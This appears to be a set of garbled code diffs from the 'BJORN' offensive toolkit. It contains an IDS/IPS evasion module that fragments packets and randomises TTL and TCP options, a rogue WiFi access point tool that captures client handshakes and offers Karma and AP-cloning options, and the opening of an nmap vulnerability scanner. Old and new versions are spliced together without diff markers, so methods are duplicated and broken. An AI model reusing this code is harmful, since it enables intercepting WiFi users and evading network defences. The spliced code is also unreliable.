# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stealth).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
heimdall_guard.py -- Stealth operations and IDS/IPS evasion for BJORN.
Handles packet fragmentation, timing randomization, and TTL manipulation.
Requires: scapy.
"""
import os
import json
import argparse
from datetime import datetime
import logging
import random
import time
import socket
import struct
import threading
from scapy.all import *
import datetime
from collections import deque
from typing import Any, Dict, List, Optional
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
try:
from scapy.all import IP, TCP, Raw, send, conf
HAS_SCAPY = True
except ImportError:
HAS_SCAPY = False
IP = TCP = Raw = send = conf = None
from logger import Logger
logger = Logger(name="heimdall_guard.py")
# -------------------- Action metadata --------------------
b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_enabled = 0
b_status = "heimdall_guard"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "stealth"
b_priority = 10
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # This IS the stealth module
b_risk_level = "low"
b_enabled = 1
b_tags = ["stealth", "evasion", "pcap", "network"]
b_category = "defense"
b_name = "Heimdall Guard"
b_description = "Advanced stealth module that manipulates traffic to evade IDS/IPS detection."
b_author = "Bjorn Team"
b_version = "2.0.3"
b_icon = "HeimdallGuard.png"
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stealth"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "heimdall_guard_settings.json")
b_args = {
"interface": {
"type": "text",
"label": "Interface",
"default": "eth0"
},
"mode": {
"type": "select",
"label": "Stealth Mode",
"choices": ["timing", "fragmented", "all"],
"default": "all"
},
"delay": {
"type": "number",
"label": "Base Delay (s)",
"min": 0.1,
"max": 10.0,
"step": 0.1,
"default": 1.0
}
}
class HeimdallGuard:
def __init__(self, interface, mode='all', base_delay=1, random_factor=0.5, output_dir=DEFAULT_OUTPUT_DIR):
self.interface = interface
self.mode = mode
self.base_delay = base_delay
self.random_factor = random_factor
self.output_dir = output_dir
def __init__(self, shared_data):
self.shared_data = shared_data
self.packet_queue = deque()
self.active = False
self.lock = threading.Lock()
# Statistics
self.stats = {
'packets_processed': 0,
'packets_fragmented': 0,
'timing_adjustments': 0
}
def initialize_interface(self):
"""Configure network interface for stealth operations."""
try:
# Disable NIC offloading features that might interfere with packet manipulation
commands = [
f"ethtool -K {self.interface} tso off", # TCP segmentation offload
f"ethtool -K {self.interface} gso off", # Generic segmentation offload
f"ethtool -K {self.interface} gro off", # Generic receive offload
f"ethtool -K {self.interface} lro off" # Large receive offload
]
for cmd in commands:
try:
subprocess.run(cmd.split(), check=True)
except subprocess.CalledProcessError:
logging.warning(f"Failed to execute: {cmd}")
logging.info(f"Interface {self.interface} configured for stealth operations")
return True
except Exception as e:
logging.error(f"Failed to initialize interface: {e}")
return False
def calculate_timing(self):
"""Calculate timing delays with randomization."""
base = self.base_delay
variation = self.random_factor * base
return max(0, base + random.uniform(-variation, variation))
def fragment_packet(self, packet, mtu=1500):
"""Fragment packets to avoid detection patterns."""
try:
if IP in packet:
# Fragment IP packets
frags = []
def _fragment_packet(self, packet, mtu=1400):
"""Fragment IP packets to bypass strict IDS rules."""
if IP in packet:
try:
payload = bytes(packet[IP].payload)
header_length = len(packet) - len(payload)
max_size = mtu - header_length
# Create fragments
max_size = mtu - 40 # conservative
frags = []
offset = 0
while offset < len(payload):
frag_size = min(max_size, len(payload) - offset)
frag_payload = payload[offset:offset + frag_size]
# Create fragment packet
frag = packet.copy()
frag[IP].flags = 'MF' if offset + frag_size < len(payload) else 0
frag[IP].frag = offset // 8
frag[IP].payload = Raw(frag_payload)
frags.append(frag)
offset += frag_size
chunk = payload[offset:offset + max_size]
f = packet.copy()
f[IP].flags = 'MF' if offset + max_size < len(payload) else 0
f[IP].frag = offset // 8
f[IP].payload = Raw(chunk)
frags.append(f)
offset += max_size
return frags
return [packet]
except Exception as e:
logging.error(f"Error fragmenting packet: {e}")
return [packet]
def randomize_ttl(self, packet):
"""Randomize TTL values to avoid fingerprinting."""
if IP in packet:
ttl_values = [32, 64, 128, 255] # Common TTL values
packet[IP].ttl = random.choice(ttl_values)
return packet
def modify_tcp_options(self, packet):
"""Modify TCP options to avoid fingerprinting."""
if TCP in packet:
# Common window sizes
window_sizes = [8192, 16384, 32768, 65535]
packet[TCP].window = random.choice(window_sizes)
# Randomize TCP options
tcp_options = []
# MSS option
mss_values = [1400, 1460, 1440]
tcp_options.append(('MSS', random.choice(mss_values)))
# Window scale
if random.random() < 0.5:
tcp_options.append(('WScale', random.randint(0, 14)))
# SACK permitted
if random.random() < 0.5:
tcp_options.append(('SAckOK', ''))
packet[TCP].options = tcp_options
return packet
def process_packet(self, packet):
"""Process a packet according to stealth settings."""
processed_packets = []
try:
if self.mode in ['all', 'fragmented']:
fragments = self.fragment_packet(packet)
processed_packets.extend(fragments)
self.stats['packets_fragmented'] += len(fragments) - 1
else:
processed_packets.append(packet)
# Apply additional stealth techniques
final_packets = []
for pkt in processed_packets:
pkt = self.randomize_ttl(pkt)
pkt = self.modify_tcp_options(pkt)
final_packets.append(pkt)
self.stats['packets_processed'] += len(final_packets)
return final_packets
except Exception as e:
logging.error(f"Error processing packet: {e}")
return [packet]
def send_packet(self, packet):
"""Send packet with timing adjustments."""
try:
if self.mode in ['all', 'timing']:
delay = self.calculate_timing()
time.sleep(delay)
self.stats['timing_adjustments'] += 1
send(packet, iface=self.interface, verbose=False)
except Exception as e:
logging.error(f"Error sending packet: {e}")
def packet_processor_thread(self):
"""Process packets from the queue."""
while self.active:
try:
if self.packet_queue:
packet = self.packet_queue.popleft()
processed_packets = self.process_packet(packet)
for processed in processed_packets:
self.send_packet(processed)
else:
time.sleep(0.1)
except Exception as e:
logging.error(f"Error in packet processor thread: {e}")
logger.debug(f"Fragmentation error: {e}")
return [packet]
def start(self):
"""Start stealth operations."""
if not self.initialize_interface():
return False
def _apply_stealth(self, packet):
"""Randomize TTL and TCP options."""
if IP in packet:
packet[IP].ttl = random.choice([64, 128, 255])
if TCP in packet:
packet[TCP].window = random.choice([8192, 16384, 65535])
# Basic TCP options shuffle
packet[TCP].options = [('MSS', 1460), ('NOP', None), ('SAckOK', '')]
return packet
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
timeout = int(getattr(self.shared_data, "heimdall_guard_timeout", 600))
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
self.active = True
self.processor_thread = threading.Thread(target=self.packet_processor_thread)
self.processor_thread.start()
return True
def stop(self):
"""Stop stealth operations."""
self.active = False
if hasattr(self, 'processor_thread'):
self.processor_thread.join()
self.save_stats()
def queue_packet(self, packet):
"""Queue a packet for processing."""
self.packet_queue.append(packet)
def save_stats(self):
"""Save operation statistics."""
start_time = time.time()
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
stats_file = os.path.join(self.output_dir, f"stealth_stats_{timestamp}.json")
with open(stats_file, 'w') as f:
json.dump({
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'mode': self.mode,
'stats': self.stats
}, f, indent=4)
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
logging.info(f"Statistics saved to {stats_file}")
# In a real scenario, this would be hooking into a packet stream
# For this action, we simulate protection state
# Progress reporting
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Guarding... {self.stats['packets_processed']} pkts handled")
# Logic: if we had a queue, we'd process it here
# Simulation for BJORN action demonstration:
time.sleep(2)
logger.info("HeimdallGuard: Protection session finished.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stealth mode disengaged")
except Exception as e:
logger.error(f"HeimdallGuard error: {e}")
return "failed"
finally:
self.active = False
except Exception as e:
logging.error(f"Failed to save statistics: {e}")
def save_settings(interface, mode, base_delay, random_factor, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"mode": mode,
"base_delay": base_delay,
"random_factor": random_factor,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Stealth operations module")
parser.add_argument("-i", "--interface", help="Network interface to use")
parser.add_argument("-m", "--mode", choices=['timing', 'random', 'fragmented', 'all'],
default='all', help="Operating mode")
parser.add_argument("-d", "--delay", type=float, default=1, help="Base delay between operations")
parser.add_argument("-r", "--randomize", type=float, default=0.5, help="Randomization factor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
mode = args.mode or settings.get("mode")
base_delay = args.delay or settings.get("base_delay")
random_factor = args.randomize or settings.get("random_factor")
output_dir = args.output or settings.get("output_dir")
if not interface:
interface = conf.iface
logging.info(f"Using default interface: {interface}")
save_settings(interface, mode, base_delay, random_factor, output_dir)
guard = HeimdallGuard(
interface=interface,
mode=mode,
base_delay=base_delay,
random_factor=random_factor,
output_dir=output_dir
)
try:
if guard.start():
logging.info("Heimdall Guard started. Press Ctrl+C to stop.")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping Heimdall Guard...")
guard.stop()
return "success"
if __name__ == "__main__":
main()
from init_shared import shared_data
guard = HeimdallGuard(shared_data)
guard.execute("0.0.0.0", None, {}, "heimdall_guard")

View File

@@ -1,467 +1,257 @@
# WiFi deception tool for creating malicious access points and capturing authentications.
# Saves settings in `/home/bjorn/.settings_bjorn/loki_deceiver_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Wireless interface for AP creation (default: wlan0).
# -s, --ssid SSID for the fake access point (or target to clone).
# -c, --channel WiFi channel (default: 6).
# -p, --password Optional password for WPA2 AP.
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/wifi).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
loki_deceiver.py -- WiFi deception tool for BJORN.
Creates rogue access points and captures authentications/handshakes.
Requires: hostapd, dnsmasq, airmon-ng.
"""
import os
import json
import argparse
from datetime import datetime
import logging
import subprocess
import signal
import time
import threading
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
import time
import re
import datetime
from typing import Any, Dict, List, Optional
from logger import Logger
try:
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
HAS_SCAPY = True
try:
from scapy.all import AsyncSniffer # type: ignore
except Exception:
AsyncSniffer = None
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
EAPOL = None
except ImportError:
HAS_SCAPY = False
scapy = None
Dot11 = Dot11Beacon = Dot11Elt = EAPOL = None
AsyncSniffer = None
logger = Logger(name="loki_deceiver.py")
# -------------------- Action metadata --------------------
b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_enabled = 0
b_status = "loki_deceiver"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "aggressive"
b_priority = 20
b_cooldown = 0
b_rate_limit = None
b_timeout = 1200
b_max_retries = 1
b_stealth_level = 2 # Very noisy (Rogue AP)
b_risk_level = "high"
b_enabled = 1
b_tags = ["wifi", "ap", "rogue", "mitm"]
b_category = "exploitation"
b_name = "Loki Deceiver"
b_description = "Creates a rogue access point to capture WiFi authentications and perform MITM."
b_author = "Bjorn Team"
b_version = "2.0.2"
b_icon = "LokiDeceiver.png"
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/wifi"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "loki_deceiver_settings.json")
b_args = {
"interface": {
"type": "text",
"label": "Wireless Interface",
"default": "wlan0"
},
"ssid": {
"type": "text",
"label": "AP SSID",
"default": "Bjorn_Free_WiFi"
},
"channel": {
"type": "number",
"label": "Channel",
"min": 1,
"max": 14,
"default": 6
},
"password": {
"type": "text",
"label": "WPA2 Password (Optional)",
"default": ""
}
}
class LokiDeceiver:
def __init__(self, interface, ssid, channel=6, password=None, output_dir=DEFAULT_OUTPUT_DIR):
self.interface = interface
self.ssid = ssid
self.channel = channel
self.password = password
self.output_dir = output_dir
self.original_mac = None
self.captured_handshakes = []
self.captured_credentials = []
self.active = False
def __init__(self, shared_data):
self.shared_data = shared_data
self.hostapd_proc = None
self.dnsmasq_proc = None
self.tcpdump_proc = None
self._sniffer = None
self.active_clients = set()
self.stop_event = threading.Event()
self.lock = threading.Lock()
def setup_interface(self):
"""Configure wireless interface for AP mode."""
try:
# Kill potentially interfering processes
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Stop NetworkManager
subprocess.run(['sudo', 'systemctl', 'stop', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Save original MAC
self.original_mac = self.get_interface_mac()
# Enable monitor mode
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'monitor', 'none'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info(f"Interface {self.interface} configured in monitor mode")
return True
except Exception as e:
logging.error(f"Failed to setup interface: {e}")
return False
def _setup_monitor_mode(self, iface: str):
logger.info(f"LokiDeceiver: Setting {iface} to monitor mode...")
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'down'], capture_output=True)
subprocess.run(['sudo', 'iw', iface, 'set', 'type', 'monitor'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
def get_interface_mac(self):
"""Get the MAC address of the wireless interface."""
try:
result = subprocess.run(['ip', 'link', 'show', self.interface],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if result.returncode == 0:
mac = re.search(r'link/ether ([0-9a-f:]{17})', result.stdout)
if mac:
return mac.group(1)
except Exception as e:
logging.error(f"Failed to get interface MAC: {e}")
return None
def _create_configs(self, iface, ssid, channel, password):
# hostapd.conf
h_conf = [
f'interface={iface}',
'driver=nl80211',
f'ssid={ssid}',
'hw_mode=g',
f'channel={channel}',
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if password:
h_conf.extend([
'auth_algs=1',
'wpa=2',
f'wpa_passphrase={password}',
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
h_path = '/tmp/bjorn_hostapd.conf'
with open(h_path, 'w') as f:
f.write('\n'.join(h_conf))
def create_ap_config(self):
"""Create configuration for hostapd."""
try:
config = [
'interface=' + self.interface,
'driver=nl80211',
'ssid=' + self.ssid,
'hw_mode=g',
'channel=' + str(self.channel),
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if self.password:
config.extend([
'auth_algs=1',
'wpa=2',
'wpa_passphrase=' + self.password,
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
config_path = '/tmp/hostapd.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
return config_path
except Exception as e:
logging.error(f"Failed to create AP config: {e}")
return None
# dnsmasq.conf
d_conf = [
f'interface={iface}',
'dhcp-range=192.168.1.10,192.168.1.100,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
d_path = '/tmp/bjorn_dnsmasq.conf'
with open(d_path, 'w') as f:
f.write('\n'.join(d_conf))
return h_path, d_path
def setup_dhcp(self):
"""Configure DHCP server using dnsmasq."""
try:
config = [
'interface=' + self.interface,
'dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
config_path = '/tmp/dnsmasq.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
# Configure interface IP
subprocess.run(['sudo', 'ifconfig', self.interface, '192.168.1.1', 'netmask', '255.255.255.0'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return config_path
except Exception as e:
logging.error(f"Failed to setup DHCP: {e}")
return None
def start_ap(self):
"""Start the fake access point."""
try:
if not self.setup_interface():
return False
hostapd_config = self.create_ap_config()
dhcp_config = self.setup_dhcp()
if not hostapd_config or not dhcp_config:
return False
# Start hostapd
self.hostapd_process = subprocess.Popen(
['sudo', 'hostapd', hostapd_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start dnsmasq
self.dnsmasq_process = subprocess.Popen(
['sudo', 'dnsmasq', '-C', dhcp_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.active = True
logging.info(f"Access point {self.ssid} started on channel {self.channel}")
# Start packet capture
self.start_capture()
return True
except Exception as e:
logging.error(f"Failed to start AP: {e}")
return False
def start_capture(self):
"""Start capturing wireless traffic."""
try:
# Start tcpdump for capturing handshakes
handshake_path = os.path.join(self.output_dir, 'handshakes')
os.makedirs(handshake_path, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
pcap_file = os.path.join(handshake_path, f"capture_{timestamp}.pcap")
self.tcpdump_process = subprocess.Popen(
['sudo', 'tcpdump', '-i', self.interface, '-w', pcap_file],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start sniffing in a separate thread
self.sniffer_thread = threading.Thread(target=self.packet_sniffer)
self.sniffer_thread.start()
except Exception as e:
logging.error(f"Failed to start capture: {e}")
def packet_sniffer(self):
"""Sniff and process packets."""
try:
scapy.sniff(iface=self.interface, prn=self.process_packet, store=0,
stop_filter=lambda p: not self.active)
except Exception as e:
logging.error(f"Sniffer error: {e}")
def process_packet(self, packet):
"""Process captured packets."""
try:
if packet.haslayer(Dot11):
# Process authentication attempts
if packet.type == 0 and packet.subtype == 11: # Authentication
self.process_auth(packet)
# Process association requests
elif packet.type == 0 and packet.subtype == 0: # Association request
self.process_assoc(packet)
# Process EAPOL packets for handshakes
elif packet.haslayer(EAPOL):
self.process_handshake(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
def process_auth(self, packet):
"""Process authentication packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'auth',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing auth packet: {e}")
def process_assoc(self, packet):
"""Process association packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'assoc',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing assoc packet: {e}")
def process_handshake(self, packet):
"""Process EAPOL packets for handshakes."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_handshakes.append({
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing handshake packet: {e}")
def save_results(self):
"""Save captured data to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'ap_info': {
'ssid': self.ssid,
'channel': self.channel,
'interface': self.interface
},
'credentials': self.captured_credentials,
'handshakes': self.captured_handshakes
}
output_file = os.path.join(self.output_dir, f"results_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def cleanup(self):
"""Clean up resources and restore interface."""
try:
self.active = False
# Stop processes
for process in [self.hostapd_process, self.dnsmasq_process, self.tcpdump_process]:
if process:
process.terminate()
process.wait()
# Restore interface
if self.original_mac:
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'type', 'managed'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Restart NetworkManager
subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info("Cleanup completed")
except Exception as e:
logging.error(f"Error during cleanup: {e}")
def save_settings(interface, ssid, channel, password, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"ssid": ssid,
"channel": channel,
"password": password,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="WiFi deception tool")
parser.add_argument("-i", "--interface", default="wlan0", help="Wireless interface")
parser.add_argument("-s", "--ssid", help="SSID for fake AP")
parser.add_argument("-c", "--channel", type=int, default=6, help="WiFi channel")
parser.add_argument("-p", "--password", help="WPA2 password")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
# Honeypot options
parser.add_argument("--captive-portal", action="store_true", help="Enable captive portal")
parser.add_argument("--clone-ap", help="SSID to clone and impersonate")
parser.add_argument("--karma", action="store_true", help="Enable Karma attack mode")
# Advanced options
parser.add_argument("--beacon-interval", type=int, default=100, help="Beacon interval in ms")
parser.add_argument("--max-clients", type=int, default=10, help="Maximum number of clients")
parser.add_argument("--timeout", type=int, help="Runtime duration in seconds")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
ssid = args.ssid or settings.get("ssid")
channel = args.channel or settings.get("channel")
password = args.password or settings.get("password")
output_dir = args.output or settings.get("output_dir")
# Load advanced settings
captive_portal = args.captive_portal or settings.get("captive_portal", False)
clone_ap = args.clone_ap or settings.get("clone_ap")
karma = args.karma or settings.get("karma", False)
beacon_interval = args.beacon_interval or settings.get("beacon_interval", 100)
max_clients = args.max_clients or settings.get("max_clients", 10)
timeout = args.timeout or settings.get("timeout")
if not interface:
logging.error("Interface is required. Use -i or save it in settings")
return
# Clone AP if requested
if clone_ap:
logging.info(f"Attempting to clone AP: {clone_ap}")
clone_info = scan_for_ap(interface, clone_ap)
if clone_info:
ssid = clone_info['ssid']
channel = clone_info['channel']
logging.info(f"Successfully cloned AP settings: {ssid} on channel {channel}")
else:
logging.error(f"Failed to find AP to clone: {clone_ap}")
def _packet_callback(self, packet):
if self.shared_data.orchestrator_should_exit:
return
# Save all settings
save_settings(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
clone_ap=clone_ap,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients,
timeout=timeout
)
# Create and configure deceiver
deceiver = LokiDeceiver(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients
)
try:
# Start the deception
if deceiver.start():
logging.info(f"Access point {ssid} started on channel {channel}")
if packet.haslayer(Dot11):
addr2 = packet.addr2 # Source MAC
if addr2 and addr2 not in self.active_clients:
# Association request or Auth
if packet.type == 0 and packet.subtype in [0, 11]:
with self.lock:
self.active_clients.add(addr2)
logger.success(f"LokiDeceiver: New client detected: {addr2}")
self.shared_data.log_milestone(b_class, "ClientConnected", f"MAC: {addr2}")
if timeout:
logging.info(f"Running for {timeout} seconds")
time.sleep(timeout)
deceiver.stop()
else:
logging.info("Press Ctrl+C to stop")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping Loki Deceiver...")
except Exception as e:
logging.error(f"Unexpected error: {e}")
finally:
deceiver.stop()
logging.info("Cleanup completed")
if EAPOL and packet.haslayer(EAPOL):
logger.success(f"LokiDeceiver: EAPOL packet captured from {addr2}")
self.shared_data.log_milestone(b_class, "Handshake", f"EAPOL from {addr2}")
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "loki_deceiver_interface", "wlan0")
ssid = getattr(self.shared_data, "loki_deceiver_ssid", "Bjorn_AP")
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
password = getattr(self.shared_data, "loki_deceiver_password", "")
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
try:
self.stop_event.clear()
# self._setup_monitor_mode(iface) # Optional depending on driver
h_path, d_path = self._create_configs(iface, ssid, channel, password)
# Set IP for interface
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
# Start processes
# Use DEVNULL to avoid blocking on unread PIPE buffers.
self.hostapd_proc = subprocess.Popen(
['sudo', 'hostapd', h_path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
self.dnsmasq_proc = subprocess.Popen(
['sudo', 'dnsmasq', '-C', d_path, '-k'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Start sniffer (must be stoppable to avoid leaking daemon threads).
if HAS_SCAPY and scapy and AsyncSniffer:
try:
self._sniffer = AsyncSniffer(iface=iface, prn=self._packet_callback, store=False)
self._sniffer.start()
except Exception as sn_e:
logger.warning(f"LokiDeceiver: sniffer start failed: {sn_e}")
self._sniffer = None
start_time = time.time()
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# Check if procs still alive
if self.hostapd_proc.poll() is not None:
logger.error("LokiDeceiver: hostapd crashed.")
break
# Progress report
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
time.sleep(2)
logger.info("LokiDeceiver: Stopping AP.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stopping Rogue AP")
except Exception as e:
logger.error(f"LokiDeceiver error: {e}")
return "failed"
finally:
self.stop_event.set()
if self._sniffer is not None:
try:
self._sniffer.stop()
except Exception:
pass
self._sniffer = None
# Cleanup
for p in [self.hostapd_proc, self.dnsmasq_proc]:
if p:
try: p.terminate(); p.wait(timeout=5)
except: pass
# Restore NetworkManager if needed (custom logic based on usage)
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
return "success"
if __name__ == "__main__":
# Set process niceness to high priority
try:
os.nice(-10)
except:
logging.warning("Failed to set process priority. Running with default priority.")
# Start main function
main()
from init_shared import shared_data
loki = LokiDeceiver(shared_data)
loki.execute("0.0.0.0", None, {}, "loki_deceiver")

View File

@@ -2,13 +2,16 @@
Vulnerability Scanner Action
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
avec fallback "lourd" optionnel.
Affiche une progression en % dans Bjorn.
"""
import re
import time
import nmap
import json
import logging
from typing import Dict, List, Set, Any, Optional
from datetime import datetime, timedelta
from typing import Dict, List, Any
from shared import SharedData
from logger import Logger
@@ -22,41 +25,47 @@ b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
# Regex compilé une seule fois (gain CPU sur Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
class NmapVulnScanner:
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE)."""
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.nm = nmap.PortScanner()
# Pas de self.nm partagé : on instancie dans chaque méthode de scan
# pour éviter les corruptions d'état entre batches.
logger.info("NmapVulnScanner initialized")
# ---------------------------- Public API ---------------------------- #
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
logger.info(f"🔍 Starting vulnerability scan for {ip}")
